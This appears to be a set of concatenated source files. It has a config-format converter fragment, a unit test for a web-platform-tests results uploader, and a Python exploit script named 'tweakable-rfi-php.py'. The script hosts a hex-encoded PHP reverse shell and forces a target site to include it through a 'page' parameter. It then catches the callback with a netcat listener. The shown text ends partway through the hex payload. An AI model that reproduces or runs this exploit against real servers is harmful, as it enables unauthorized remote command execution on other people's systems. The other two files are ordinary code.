                   "Supported versions: %s") % (self.version, allowed)
            raise exceptions.InvalidTaskException(msg)

    def _validate_json(self, config):
        """Validate config against the schema of its version."""
        try:
            jsonschema.validate(config, self.CONFIG_SCHEMAS[self.version])
        except Exception as e:
            raise exceptions.InvalidTaskException(str(e))

    @staticmethod
    def _adopt_task_format_v1(config):
        """Convert a v1 config dict into the equivalent v2 structure.

        Each v1 workload becomes a standalone v2 subtask; runner and hook
        entries are reshaped into the {type: options} entity form.
        """
        subtasks = []
        for name, v1_workloads in config.items():
            for v1_workload in v1_workloads:
                subtask = copy.deepcopy(v1_workload)
                subtask["scenario"] = {name: subtask.pop("args", {})}
                subtask["contexts"] = subtask.pop("context", {})
                subtask["title"] = name
                if "runner" in subtask:
                    runner_type = subtask["runner"].pop("type")
                    subtask["runner"] = {runner_type: subtask["runner"]}
                if "hooks" in subtask:
                    hooks = subtask["hooks"]
                    subtask["hooks"] = []
                    for hook_cfg in hooks:
                        trigger_cfg = hook_cfg["trigger"]
                        subtask["hooks"].append(
                            {"description": hook_cfg.get("description"),
                             "action": {
                                 hook_cfg["name"]: hook_cfg["args"]},
                             "trigger": {
                                 trigger_cfg["name"]: trigger_cfg["args"]}}
                        )
                subtasks.append(subtask)
        return {"title": "Task (adopted from task format v1)",
                "subtasks": subtasks}
|
upload_wpt_results_test.py | # Copyright 2018 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import BaseHTTPServer
import gzip
import json
import os
import shutil
import subprocess
import sys
import tempfile
import threading
import unittest
# Absolute directory containing this test module.
here = os.path.dirname(os.path.abspath(__file__))
# Directory holding the stubbed `gsutil` used in place of the real CLI;
# it is prepended to PATH by the tests below.
gsutil_stub_dir = os.path.sep.join([here, 'gsutil-stub'])
# File the stub writes; presumably a record of the arguments it was
# invoked with (removed in setUp) — TODO confirm against the stub script.
gsutil_stub_args = os.path.sep.join([gsutil_stub_dir, 'gsutil_args.json'])
# Directory where the stub deposits the content that would have been
# uploaded; inspected by assertJsonFiles.
gsutil_stub_content = os.path.sep.join([gsutil_stub_dir, 'content-to-upload'])
# Path of the upload script under test.
upload_bin = os.path.sep.join(
    [here, '..', 'src', 'scripts', 'upload-wpt-results.py']
)
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Records every POST received into the owning server's `requests`
    list and answers with the server's configured `status_code`."""

    def log_message(*argv):
        # Suppress the default per-request logging to stderr.
        pass

    def do_POST(self):
        length = int(self.headers['Content-Length'])
        payload = str(self.rfile.read(length))
        self.server.requests.append({'path': self.path, 'body': payload})
        self.send_response(self.server.status_code)
        self.send_header('Content-type', 'text/html')
        self.end_headers()
def make_results():
    """Return a fresh two-chunk set of fake WPT results keyed by chunk file."""
    first_chunk = [
        {'test': '/js/bitwise-or.html', 'status': 'OK', 'subtests': []},
        {
            'test': '/js/bitwise-and.html',
            'status': 'OK',
            'subtests': [
                {'status': 'FAIL', 'message': 'bad', 'name': 'first'},
                {'status': 'FAIL', 'message': 'bad', 'name': 'second'}
            ]
        }
    ]
    second_chunk = [
        {'test': '/js/bitwise-or-2.html', 'status': 'OK', 'subtests': []}
    ]
    return {
        '1_of_2.json': {'results': first_chunk},
        '2_of_2.json': {'results': second_chunk}
    }
class TestUploadWptResults(unittest.TestCase):
    """End-to-end tests for upload-wpt-results.py.

    The script is run as a subprocess with a stubbed `gsutil` first on
    PATH; a local HTTP server stands in for the results-notification
    endpoint.
    """

    def setUp(self):
        """Create a scratch results directory and clear stale stub output."""
        self.temp_dir = tempfile.mkdtemp()
        self.server = None
        # gsutil "stub" output files and directories will only be present if
        # the tests were run previously
        try:
            os.remove(gsutil_stub_args)
        except OSError:
            pass
        try:
            shutil.rmtree(gsutil_stub_content)
        except OSError:
            pass

    def tearDown(self):
        """Remove the scratch directory and stop the notification server."""
        try:
            shutil.rmtree(self.temp_dir)
        except OSError:
            pass
        if self.server:
            self.server.shutdown()
            self.server.server_close()
            self.server_thread.join()

    def upload(self, browser_name, browser_version, os_name, os_version,
               results_dir, results, port, gsutil_return_code=0):
        """Write `results` to disk and run the upload script against them.

        The stub gsutil is placed first on PATH and told (via
        GSUTIL_RETURN_CODE) what exit status to simulate.

        :returns: (returncode, stdout, stderr) of the script process
        """
        env = dict(os.environ)
        env['PATH'] = gsutil_stub_dir + os.pathsep + os.environ['PATH']
        env['GSUTIL_RETURN_CODE'] = str(gsutil_return_code)
        for filename in results:
            with open(os.path.join(results_dir, filename), 'w') as handle:
                json.dump(results[filename], handle)
        proc = subprocess.Popen([
            upload_bin, '--raw-results-directory', results_dir,
            '--platform-id', '%s-%s-%s-%s' % (browser_name, browser_version,
                                              os_name, os_version),
            '--browser-name', browser_name,
            '--browser-version', browser_version,
            '--os-name', os_name,
            '--os-version', os_version,
            '--wpt-revision', '1234567890abcdef',
            '--wpt-revision-date', '2018-03-19T17:54:32-04:00',
            '--bucket-name', 'wpt-test',
            '--notify-url', 'http://localhost:%s' % port,
            '--notify-secret', 'fake-secret'
        ], env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        stdout, stderr = proc.communicate()
        return (proc.returncode, stdout, stderr)

    def assertJsonFiles(self, dir_name, data):
        """Assert each gzipped file under `dir_name` decodes to `data[filename]`."""
        for filename in data:
            path = os.path.sep.join([dir_name] + filename.split('/'))
            with gzip.open(path) as handle:
                self.assertEqual(data[filename], json.loads(handle.read()))

    def start_server(self, port):
        """Start the fake notification endpoint on `port` in a daemon thread."""
        self.server = BaseHTTPServer.HTTPServer(('', port), Handler)
        self.server.status_code = 201
        self.server.requests = []

        def target(server):
            server.serve_forever()

        self.server_thread = threading.Thread(
            target=target, args=(self.server,)
        )
        self.server_thread.start()

    def test_basic_firefox(self):
        """Happy path: summary + per-test files uploaded, notification sent."""
        self.start_server(9801)
        returncode, stdout, stderr = self.upload('firefox',
                                                 '2.0',
                                                 'linux',
                                                 '4.0',
                                                 self.temp_dir,
                                                 make_results(),
                                                 9801)
        self.assertEqual(returncode, 0, stderr)
        self.assertJsonFiles(gsutil_stub_content, {
            'firefox-2.0-linux-4.0-summary.json.gz': {
                '/js/bitwise-and.html': [1, 3],
                '/js/bitwise-or-2.html': [1, 1],
                '/js/bitwise-or.html': [1, 1]
            },
            'firefox-2.0-linux-4.0/js/bitwise-and.html': {
                'test': '/js/bitwise-and.html',
                'status': 'OK',
                'subtests': [
                    {u'message': 'bad', 'name': 'first', 'status': 'FAIL'},
                    {u'message': 'bad', 'name': 'second', 'status': 'FAIL'}
                ]
            },
            'firefox-2.0-linux-4.0/js/bitwise-or.html': {
                'test': '/js/bitwise-or.html',
                'status': 'OK',
                'subtests': []
            },
            'firefox-2.0-linux-4.0/js/bitwise-or-2.html': {
                'test': '/js/bitwise-or-2.html',
                'status': u'OK',
                'subtests': []
            }
        })
        self.assertEqual(len(self.server.requests), 1)
        request = self.server.requests[0]
        self.assertEqual(request['path'], '/?secret=fake-secret')
        self.assertEqual(json.loads(request['body']), {
            'browser_name': 'firefox',
            'browser_version': '2.0',
            'commit_date': '2018-03-19T17:54:32-04:00',
            'os_name': 'linux',
            'os_version': '4.0',
            'results_url': 'https://storage.googleapis.com/' +
                           'wpt-test/1234567890/' +
                           'firefox-2.0-linux-4.0-summary.json.gz',
            'revision': '1234567890'
        })

    def test_basic_chrome(self):
        """Same happy path with a different browser/OS platform id."""
        self.start_server(9802)
        returncode, stdout, stderr = self.upload('chrome',
                                                 '4.3.2',
                                                 'macos',
                                                 '10.5',
                                                 self.temp_dir,
                                                 make_results(),
                                                 port=9802)
        self.assertEqual(returncode, 0, stderr)
        self.assertJsonFiles(gsutil_stub_content, {
            'chrome-4.3.2-macos-10.5-summary.json.gz': {
                '/js/bitwise-and.html': [1, 3],
                '/js/bitwise-or-2.html': [1, 1],
                '/js/bitwise-or.html': [1, 1]
            },
            'chrome-4.3.2-macos-10.5/js/bitwise-and.html': {
                'test': '/js/bitwise-and.html',
                'status': 'OK',
                'subtests': [
                    {u'message': 'bad', 'name': 'first', 'status': 'FAIL'},
                    {u'message': 'bad', 'name': 'second', 'status': 'FAIL'}
                ]
            },
            'chrome-4.3.2-macos-10.5/js/bitwise-or.html': {
                'test': '/js/bitwise-or.html',
                'status': 'OK',
                'subtests': []
            },
            'chrome-4.3.2-macos-10.5/js/bitwise-or-2.html': {
                'test': '/js/bitwise-or-2.html',
                'status': u'OK',
                'subtests': []
            }
        })
        self.assertEqual(len(self.server.requests), 1)
        request = self.server.requests[0]
        self.assertEqual(request['path'], '/?secret=fake-secret')
        self.assertEqual(json.loads(request['body']), {
            'browser_name': 'chrome',
            'browser_version': '4.3.2',
            'commit_date': '2018-03-19T17:54:32-04:00',
            'os_name': 'macos',
            'os_version': '10.5',
            'results_url': 'https://storage.googleapis.com/' +
                           'wpt-test/1234567890/' +
                           'chrome-4.3.2-macos-10.5-summary.json.gz',
            'revision': '1234567890'
        })

    def test_expand_foreign_platform(self):
        """An unrecognized platform must fail without notifying anyone."""
        self.start_server(9802)
        returncode, stdout, stderr = self.upload('chrome',
                                                 '4.3.2',
                                                 'beos',
                                                 '*',
                                                 self.temp_dir,
                                                 make_results(),
                                                 port=9802)
        self.assertNotEqual(returncode, 0, stdout)
        self.assertEqual(len(self.server.requests), 0)

    def test_failed_request(self):
        """A 500 from the notification endpoint must fail the script."""
        self.start_server(9804)
        self.server.status_code = 500
        returncode, stdout, stderr = self.upload('chrome',
                                                 '4.3.2',
                                                 'linux',
                                                 '4.0',
                                                 self.temp_dir,
                                                 make_results(),
                                                 port=9804)
        self.assertNotEqual(returncode, 0, stdout)
        self.assertEqual(len(self.server.requests), 1)

    def test_no_server(self):
        """A connection failure to the notification endpoint must fail the script."""
        returncode, stdout, stderr = self.upload('chrome',
                                                 '4.3.2',
                                                 'linux',
                                                 '4.0',
                                                 self.temp_dir,
                                                 make_results(),
                                                 port=9802)
        self.assertNotEqual(returncode, 0, stdout)

    def test_failed_gsutil(self):
        """A gsutil failure must abort before any notification is sent."""
        self.start_server(9801)
        returncode, stdout, stderr = self.upload('chrome',
                                                 '3.2.1',
                                                 'linux',
                                                 '4.0',
                                                 self.temp_dir,
                                                 make_results(),
                                                 port=9801,
                                                 gsutil_return_code=1)
        self.assertEqual(returncode, 1, stdout)
        self.assertEqual(len(self.server.requests), 0)

    def test_duplicated_results(self):
        """Duplicate test entries across chunks must abort the upload."""
        self.start_server(9802)
        duplicated_results = make_results()
        duplicated_results['2_of_2.json']['results'].append(
            duplicated_results['1_of_2.json']['results'][0]
        )
        # Use the same port the server was started on (was 9801, a typo):
        # otherwise the zero-requests assertion below could never observe
        # a wrongly-sent notification.
        returncode, stdout, stderr = self.upload('firefox',
                                                 '1.0.1',
                                                 'linux',
                                                 '4.0',
                                                 self.temp_dir,
                                                 duplicated_results,
                                                 port=9802)
        self.assertEqual(returncode, 1, stdout)
        self.assertFalse(os.access(gsutil_stub_content, os.R_OK))
        self.assertEqual(len(self.server.requests), 0)
# Allow running the tests directly: `python upload_wpt_results_test.py`.
if __name__ == '__main__':
    unittest.main()
|
tweakable-rfi-php.py | #! /usr/bin/env python3
from sys import argv
from requests import get
from os import path, mkdir, system, remove, rmdir
from socketserver import TCPServer
from http.server import BaseHTTPRequestHandler
from threading import Thread, Timer
def main():
    """Parse CLI arguments, schedule the exploit, then block on the listener."""
    if len(argv) != 4:
        print('Usage: exploit.py target listener_ip listener_port')
        exit(-1)
    target, ip, port = argv[1], argv[2], argv[3]
    # Fire the exploit a few seconds from now so the listener started
    # below is already waiting when the reverse shell calls back.
    Timer(3, exploit, args=(target, ip, port)).start()
    start_listener(port)
def exploit(target, ip, port):
    """Serve the PHP payload over HTTP once and trigger the RFI on the target."""
    payload_url = prepare_payload(ip, port)
    handler_cls = generate_handler({'/p.php': 'application/octet-stream'})
    with TCPServer(("", 80), handler_cls) as httpd:
        print("serving at port", 80)
        # Request the vulnerable page in the background; the target will
        # come back to this server to fetch /p.php.
        Thread(target=req, args=(target, payload_url)).start()
        httpd.handle_request()
        httpd.server_close()
        cleanup()
def generate_handler(files=None):
    """Build a request-handler class serving ./exp/p.php for known paths.

    :param files: mapping of URL path -> Content-Type to serve; requests
        for any other path get a 404. Defaults to an empty mapping.
    :returns: a BaseHTTPRequestHandler subclass closed over `files`.
    """
    if files is None:
        files = {}

    class MyHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            """Respond to a GET request."""
            if self.path in files.keys():
                content_type = files[self.path]
                # Use a context manager so the payload file handle is
                # closed even on a read error (the original leaked it).
                with open('./exp/p.php') as payload_file:
                    content = payload_file.read()
                self.send_response(200)
                self.send_header("Content-type", content_type)
                self.end_headers()
                self.wfile.write(content.encode())
            else:
                self.send_error(404)

    return MyHandler
def start_listener(port):
    """Block in a netcat listener waiting for the reverse shell to connect.

    Runs `nc -nlvp <port>` with an argument list instead of the original
    shell-interpolated os.system() string, so an attacker-controlled or
    malformed port value cannot inject extra shell commands.
    """
    import subprocess
    subprocess.call(['nc', '-nlvp', str(port)])
def prepare_payload(ip, port):
    """Write the PHP reverse-shell payload to ./exp/p.php, aimed at ip:port.

    :returns: the URL from which the target can fetch the payload.
    """
    if not path.exists('./exp'):
        mkdir('./exp')
    # Decode the hex-encoded template and retarget its callback address.
    template = bytes.fromhex(get_base_payload()).decode('UTF-8')
    shell_call = "Shell('{0}', {1})".format(ip, port)
    payload = template.replace("Shell('localhost', 4444)", shell_call)
    with open('./exp/p.php', 'w') as payload_file:
        payload_file.write(payload)
    return 'http://' + ip + '/p.php'
def cleanup():
    """Delete the payload file and its directory, if they exist."""
    # File first, then the (now empty) directory.
    for victim, destroy in (('./exp/p.php', remove), ('./exp', rmdir)):
        if path.exists(victim):
            destroy(victim)
def req(target, p):
    """Trigger the RFI: GET the vulnerable page with ?page=<payload URL>.

    :param target: host or URL of the vulnerable site; a scheme and the
        default /site/index.php path are added when missing.
    :param p: URL of the hosted PHP payload.
    """
    # Prepend a scheme only when one is genuinely absent. The original
    # substring test ("'http' not in target") misfired for hostnames
    # that merely contain "http".
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    # Append the default vulnerable path when the URL has no path part.
    # The original sliced a fixed 7 characters, which miscounted the
    # "https://" prefix.
    scheme_end = target.index('://') + 3
    if '/' not in target[scheme_end:]:
        target = target + '/site/index.php'
    get(target, params={"page": p})
def get_base_payload():
return '3c3f7068700a2f2f20436f70797269676874202863292032303230204976616e20c5a0696e63656b0a2f2f2076322e340a2f2f205265717569726573205048502076352e302e30206f7220677265617465722e0a2f2f20576f726b73206f6e204c696e7578204f532c206d61634f532c20616e642057696e646f7773204f532e0a2f2f2053656520746865206f726967696e616c207363726970742061742068747470733a2f2f6769746875622e636f6d2f70656e746573746d6f6e6b65792f7068702d726576657273652d7368656c6c2e0a636c617373205368656c6c207b0a202020207072697661746520246164647220203d206e756c6c3b0a20202020707269766174652024706f727420203d206e756c6c3b0a202020207072697661746520246f73202020203d206e756c6c3b0a202020207072697661746520247368656c6c203d206e756c6c3b0a2020202070726976617465202464657363726970746f7273706563203d206172726179280a202020202020202030203d3e206172726179282770697065272c20277227292c202f2f207368656c6c2063616e20726561642066726f6d20535444494e0a202020202020202031203d3e206172726179282770697065272c20277727292c202f2f207368656c6c2063616e20777269746520746f205354444f55540a202020202020202032203d3e206172726179282770697065272c202777272920202f2f207368656c6c2063616e20777269746520746f205354444552520a20202020293b0a2020202070726976617465202462756666657220203d20313032343b202020202f2f20726561642f7772697465206275666665722073697a650a20202020707269766174652024636c656e202020203d20303b202020202020202f2f20636f6d6d616e64206c656e6774680a202020207072697661746520246572726f722020203d2066616c73653b2020202f2f2073747265616d20726561642f7772697465206572726f720a202020207075626c69632066756e6374696f6e205f5f636f6e7374727563742824616464722c2024706f727429207b0a202020202020202024746869732d3e61646472203d2024616464723b0a202020202020202024746869732d3e706f7274203d2024706f72743b0a202020207d0a20202020707269766174652066756e6374696f6e206465746563742829207b0a2020202020202020246465746563746564203d20747275653b0a20202020202020206966202873747269706f73285048505f4f532c20274c494e5558272920213d3d2066616c736529207b202f2f2073616d6520666f72206d61634f530a20202020202020202020202024746869732d3e6f73202020203d2027
4c494e5558273b0a20202020202020202020202024746869732d3e7368656c6c203d20272f62696e2f7368273b0a20202020202020207d20656c7365206966202873747269706f73285048505f4f532c202757494e3332272920213d3d2066616c7365207c7c2073747269706f73285048505f4f532c202757494e4e54272920213d3d2066616c7365207c7c2073747269706f73285048505f4f532c202757494e444f5753272920213d3d2066616c736529207b0a20202020202020202020202024746869732d3e6f73202020203d202757494e444f5753273b0a20202020202020202020202024746869732d3e7368656c6c203d2027636d642e657865273b0a20202020202020207d20656c7365207b0a202020202020202020202020246465746563746564203d2066616c73653b0a2020202020202020202020206563686f20225359535f4552524f523a20556e6465726c79696e67206f7065726174696e672073797374656d206973206e6f7420737570706f727465642c207363726970742077696c6c206e6f7720657869742e2e2e5c6e223b0a20202020202020207d0a202020202020202072657475726e202464657465637465643b0a202020207d0a20202020707269766174652066756e6374696f6e206461656d6f6e697a652829207b0a20202020202020202465786974203d2066616c73653b0a2020202020202020696620282166756e6374696f6e5f657869737473282770636e746c5f666f726b272929207b0a2020202020202020202020206563686f20224441454d4f4e495a453a2070636e746c5f666f726b282920646f6573206e6f74206578697374732c206d6f76696e67206f6e2e2e2e5c6e223b0a20202020202020207d20656c736520696620282824706964203d204070636e746c5f666f726b282929203c203029207b0a2020202020202020202020206563686f20224441454d4f4e495a453a2043616e6e6f7420666f726b206f66662074686520706172656e742070726f636573732c206d6f76696e67206f6e2e2e2e5c6e223b0a20202020202020207d20656c7365206966202824706964203e203029207b0a2020202020202020202020202465786974203d20747275653b0a2020202020202020202020206563686f20224441454d4f4e495a453a204368696c642070726f6365737320666f726b6564206f6666207375636365737366756c6c792c20706172656e742070726f636573732077696c6c206e6f7720657869742e2e2e5c6e223b0a20202020202020207d20656c73652069662028706f7369785f7365747369642829203c203029207b0a2020202020202020202020202f2f206f6e6365206461656d6f6e697a656420796f75207769
6c6c2061637475616c6c79206e6f206c6f6e67657220736565207468652073637269707427732064756d700a2020202020202020202020206563686f20224441454d4f4e495a453a20466f726b6564206f66662074686520706172656e742070726f63657373206275742063616e6e6f74207365742061206e6577205349442c206d6f76696e67206f6e20617320616e206f727068616e2e2e2e5c6e223b0a20202020202020207d20656c7365207b0a2020202020202020202020206563686f20224441454d4f4e495a453a20436f6d706c65746564207375636365737366756c6c79215c6e223b0a20202020202020207d0a202020202020202072657475726e2024657869743b0a202020207d0a20202020707269766174652066756e6374696f6e2073657474696e67732829207b0a2020202020202020406572726f725f7265706f7274696e672830293b0a2020202020202020407365745f74696d655f6c696d69742830293b202f2f20646f206e6f7420696d706f7365207468652073637269707420657865637574696f6e2074696d65206c696d69740a202020202020202040756d61736b2830293b202f2f20736574207468652066696c652f6469726563746f7279207065726d697373696f6e73202d2036363620666f722066696c657320616e642037373720666f72206469726563746f726965730a202020207d0a20202020707269766174652066756e6374696f6e2064756d7028246461746129207b0a20202020202020202464617461203d207374725f7265706c61636528273c272c2027266c743b272c202464617461293b0a20202020202020202464617461203d207374725f7265706c61636528273e272c20272667743b272c202464617461293b0a20202020202020206563686f2024646174613b0a202020207d0a20202020707269766174652066756e6374696f6e2072656164282473747265616d2c20246e616d652c202462756666657229207b0a202020202020202069662028282464617461203d20406672656164282473747265616d2c20246275666665722929203d3d3d2066616c736529207b202f2f20737570707265737320616e206572726f72207768656e2072656164696e672066726f6d206120636c6f73656420626c6f636b696e672073747265616d0a20202020202020202020202024746869732d3e6572726f72203d20747275653b202020202020202020202020202020202020202020202020202020202f2f2073657420676c6f62616c206572726f7220666c61670a2020202020202020202020206563686f20225354524d5f4552524f523a2043616e6e6f7420726561642066726f6d207b246e616d657d2c20736372697074207769
6c6c206e6f7720657869742e2e2e5c6e223b0a20202020202020207d0a202020202020202072657475726e2024646174613b0a202020207d0a20202020707269766174652066756e6374696f6e207772697465282473747265616d2c20246e616d652c20246461746129207b0a20202020202020206966202828246279746573203d2040667772697465282473747265616d2c2024646174612929203d3d3d2066616c736529207b202f2f20737570707265737320616e206572726f72207768656e2077726974696e6720746f206120636c6f73656420626c6f636b696e672073747265616d0a20202020202020202020202024746869732d3e6572726f72203d20747275653b202020202020202020202020202020202020202020202020202020202f2f2073657420676c6f62616c206572726f7220666c61670a2020202020202020202020206563686f20225354524d5f4552524f523a2043616e6e6f7420777269746520746f207b246e616d657d2c207363726970742077696c6c206e6f7720657869742e2e2e5c6e223b0a20202020202020207d0a202020202020202072657475726e202462797465733b0a202020207d0a202020202f2f20726561642f7772697465206d6574686f6420666f72206e6f6e2d626c6f636b696e672073747265616d730a20202020707269766174652066756e6374696f6e2072772824696e7075742c20246f75747075742c2024696e616d652c20246f6e616d6529207b0a20202020202020207768696c652028282464617461203d2024746869732d3e726561642824696e7075742c2024696e616d652c2024746869732d3e62756666657229292026262024746869732d3e777269746528246f75747075742c20246f6e616d652c2024646174612929207b0a2020202020202020202020206966202824746869732d3e6f73203d3d3d202757494e444f57532720262620246f6e616d65203d3d3d2027535444494e2729207b2024746869732d3e636c656e202b3d207374726c656e282464617461293b207d202f2f2063616c63756c6174652074686520636f6d6d616e64206c656e6774680a20202020202020202020202024746869732d3e64756d70282464617461293b202f2f2073637269707427732064756d700a20202020202020207d0a202020207d0a202020202f2f20726561642f7772697465206d6574686f6420666f7220626c6f636b696e672073747265616d732028652e672e20666f72205354444f555420616e6420535444455252206f6e2057696e646f7773204f53290a202020202f2f207765206d7573742072656164207468652065786163742062797465206c656e6774682066726f6d20612073747265616d20616e64
206e6f7420612073696e676c652062797465206d6f72650a20202020707269766174652066756e6374696f6e206272772824696e7075742c20246f75747075742c2024696e616d652c20246f6e616d6529207b0a2020202020202020246673746174203d2066737461742824696e707574293b0a20202020202020202473697a65203d202466737461745b2773697a65275d3b0a20202020202020206966202824746869732d3e6f73203d3d3d202757494e444f5753272026262024696e616d65203d3d3d20275354444f5554272026262024746869732d3e636c656e29207b0a2020202020202020202020202f2f20666f7220736f6d6520726561736f6e2057696e646f7773204f5320706970657320535444494e20696e746f205354444f55540a2020202020202020202020202f2f20776520646f206e6f74206c696b6520746861740a2020202020202020202020202f2f207765206e65656420746f20646973636172642074686520646174612066726f6d207468652073747265616d0a2020202020202020202020207768696c65202824746869732d3e636c656e203e20302026262028246279746573203d2024746869732d3e636c656e203e3d2024746869732d3e627566666572203f2024746869732d3e627566666572203a2024746869732d3e636c656e292026262024746869732d3e726561642824696e7075742c2024696e616d652c202462797465732929207b0a2020202020202020202020202020202024746869732d3e636c656e202d3d202462797465733b0a202020202020202020202020202020202473697a65202d3d202462797465733b0a2020202020202020202020207d0a20202020202020207d0a20202020202020207768696c6520282473697a65203e20302026262028246279746573203d202473697a65203e3d2024746869732d3e627566666572203f2024746869732d3e627566666572203a202473697a652920262620282464617461203d2024746869732d3e726561642824696e7075742c2024696e616d652c2024627974657329292026262024746869732d3e777269746528246f75747075742c20246f6e616d652c2024646174612929207b0a2020202020202020202020202473697a65202d3d202462797465733b0a20202020202020202020202024746869732d3e64756d70282464617461293b202f2f2073637269707427732064756d700a20202020202020207d0a202020207d0a202020207075626c69632066756e6374696f6e2072756e2829207b0a20202020202020206966202824746869732d3e6465746563742829202626202124746869732d3e6461656d6f6e697a65282929207b0a202020202020202020202020247468
69732d3e73657474696e677328293b0a0a2020202020202020202020202f2f202d2d2d2d2d20534f434b455420424547494e202d2d2d2d2d0a20202020202020202020202024736f636b6574203d204066736f636b6f70656e2824746869732d3e616464722c2024746869732d3e706f72742c20246572726e6f2c20246572727374722c203330293b0a202020202020202020202020696620282124736f636b657429207b0a202020202020202020202020202020206563686f2022534f435f4552524f523a207b246572726e6f7d3a207b246572727374727d5c6e223b0a2020202020202020202020207d20656c7365207b0a2020202020202020202020202020202073747265616d5f7365745f626c6f636b696e672824736f636b65742c2066616c7365293b202f2f207365742074686520736f636b65742073747265616d20746f206e6f6e2d626c6f636b696e67206d6f6465207c2072657475726e7320277472756527206f6e2057696e646f7773204f530a0a202020202020202020202020202020202f2f202d2d2d2d2d205348454c4c20424547494e202d2d2d2d2d0a202020202020202020202020202020202470726f63657373203d204070726f635f6f70656e2824746869732d3e7368656c6c2c2024746869732d3e64657363726970746f72737065632c202470697065732c206e756c6c2c206e756c6c293b0a2020202020202020202020202020202069662028212470726f6365737329207b0a20202020202020202020202020202020202020206563686f202250524f435f4552524f523a2043616e6e6f7420737461727420746865207368656c6c5c6e223b0a202020202020202020202020202020207d20656c7365207b0a2020202020202020202020202020202020202020666f7265616368202824706970657320617320247069706529207b0a20202020202020202020202020202020202020202020202073747265616d5f7365745f626c6f636b696e672824706970652c2066616c7365293b202f2f2073657420746865207368656c6c2073747265616d7320746f206e6f6e2d626c6f636b696e67206d6f6465207c2072657475726e73202766616c736527206f6e2057696e646f7773204f530a20202020202020202020202020202020202020207d0a0a20202020202020202020202020202020202020202f2f202d2d2d2d2d20574f524b20424547494e202d2d2d2d2d0a202020202020202020202020202020202020202024737461747573203d2070726f635f6765745f737461747573282470726f63657373293b0a2020202020202020202020202020202020202020406677726974652824736f636b65742c2022534f434b45543a205368656c6c20
68617320636f6e6e656374656421205049443a207b247374617475735b27706964275d7d5c6e22293b0a2020202020202020202020202020202020202020646f207b0a20202020202020202020202020202020202020202020202024737461747573203d2070726f635f6765745f737461747573282470726f63657373293b0a2020202020202020202020202020202020202020202020206966202866656f662824736f636b65742929207b202f2f20636865636b20666f7220656e642d6f662d66696c65206f6e20534f434b45540a202020202020202020202020202020202020202020202020202020206563686f2022534f435f4552524f523a205368656c6c20636f6e6e656374696f6e20686173206265656e207465726d696e617465645c6e223b20627265616b3b0a2020202020202020202020202020202020202020202020207d20656c7365206966202866656f66282470697065735b315d29207c7c2021247374617475735b2772756e6e696e67275d29207b20202020202020202020202020202020202f2f20636865636b20666f7220656e642d6f662d66696c65206f6e205354444f5554206f722069662070726f63657373206973207374696c6c2072756e6e696e670a202020202020202020202020202020202020202020202020202020206563686f202250524f435f4552524f523a205368656c6c2070726f6365737320686173206265656e207465726d696e617465645c6e223b202020627265616b3b202f2f2066656f66282920646f6573206e6f7420776f726b207769746820626c6f636b696e672073747265616d730a2020202020202020202020202020202020202020202020207d20202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202f2f207573652070726f635f6765745f737461747573282920696e73746561640a2020202020202020202020202020202020202020202020202473747265616d73203d206172726179280a202020202020202020202020202020202020202020202020202020202772656164272020203d3e2061727261792824736f636b65742c202470697065735b315d2c202470697065735b325d292c202f2f20534f434b4554207c205354444f5554207c205354444552520a202020202020202020202020202020202020202020202020202020202777726974652720203d3e206e756c6c2c0a202020202020202020202020202020202020202020202020202020202765786365707427203d3e206e756c6c0a202020202020202020202020202020202020202020202020293b0a202020202020202020
202020202020202020202020202020246e756d5f6368616e6765645f73747265616d73203d204073747265616d5f73656c656374282473747265616d735b2772656164275d2c202473747265616d735b277772697465275d2c202473747265616d735b27657863657074275d2c2030293b202f2f207761697420666f722073747265616d206368616e676573207c2077696c6c206e6f742077616974206f6e2057696e646f7773204f530a20202020202020202020202020202020202020202020202069662028246e756d5f6368616e6765645f73747265616d73203d3d3d2066616c736529207b0a202020202020202020202020202020202020202020202020202020206563686f20225354524d5f4552524f523a2073747265616d5f73656c6563742829206661696c65645c6e223b20627265616b3b0a2020202020202020202020202020202020202020202020207d20656c73652069662028246e756d5f6368616e6765645f73747265616d73203e203029207b0a202020202020202020202020202020202020202020202020202020206966202824746869732d3e6f73203d3d3d20274c494e55582729207b0a202020202020202020202020202020202020202020202020202020202020202069662028696e5f61727261792824736f636b657420202c202473747265616d735b2772656164275d2929207b2024746869732d3e72772824736f636b657420202c202470697065735b305d2c2027534f434b4554272c2027535444494e2720293b207d202f2f20726561642066726f6d20534f434b455420616e6420777269746520746f20535444494e0a202020202020202020202020202020202020202020202020202020202020202069662028696e5f6172726179282470697065735b325d2c202473747265616d735b2772656164275d2929207b2024746869732d3e7277282470697065735b325d2c2024736f636b657420202c2027535444455252272c2027534f434b455427293b207d202f2f20726561642066726f6d2053544445525220616e6420777269746520746f20534f434b45540a202020202020202020202020202020202020202020202020202020202020202069662028696e5f6172726179282470697065735b315d2c202473747265616d735b2772656164275d2929207b2024746869732d3e7277282470697065735b315d2c2024736f636b657420202c20275354444f5554272c2027534f434b455427293b207d202f2f20726561642066726f6d205354444f555420616e6420777269746520746f20534f434b45540a202020202020202020202020202020202020202020202020202020207d20656c7365206966202824746869732d3e6f73203d3d3d
202757494e444f57532729207b0a20202020202020202020202020202020202020202020202020202020202020202f2f206f7264657220697320696d706f7274616e740a202020202020202020202020202020202020202020202020202020202020202069662028696e5f61727261792824736f636b65742c202473747265616d735b2772656164275d292f2a2d2d2d2d2d2d2a2f29207b2024746869732d3e7277202824736f636b657420202c202470697065735b305d2c2027534f434b4554272c2027535444494e2720293b207d202f2f20726561642066726f6d20534f434b455420616e6420777269746520746f20535444494e0a20202020202020202020202020202020202020202020202020202020202020206966202828246673746174203d206673746174282470697065735b325d2929202626202466737461745b2773697a65275d29207b2024746869732d3e627277282470697065735b325d2c2024736f636b657420202c2027535444455252272c2027534f434b455427293b207d202f2f20726561642066726f6d2053544445525220616e6420777269746520746f20534f434b45540a20202020202020202020202020202020202020202020202020202020202020206966202828246673746174203d206673746174282470697065735b315d2929202626202466737461745b2773697a65275d29207b2024746869732d3e627277282470697065735b315d2c2024736f636b657420202c20275354444f5554272c2027534f434b455427293b207d202f2f20726561642066726f6d205354444f555420616e6420777269746520746f20534f434b45540a202020202020202020202020202020202020202020202020202020207d0a2020202020202020202020202020202020202020202020207d0a20202020202020202020202020202020202020207d207768696c6520282124746869732d3e6572726f72293b0a20202